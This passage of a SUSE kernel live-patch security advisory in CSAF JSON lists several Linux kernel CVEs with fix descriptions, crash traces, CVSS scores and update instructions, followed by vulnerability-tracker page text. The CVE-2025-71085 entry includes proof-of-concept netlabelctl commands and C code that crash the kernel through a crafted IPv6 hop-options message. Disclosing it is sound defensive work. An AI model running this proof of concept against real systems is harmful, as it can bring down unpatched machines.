include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…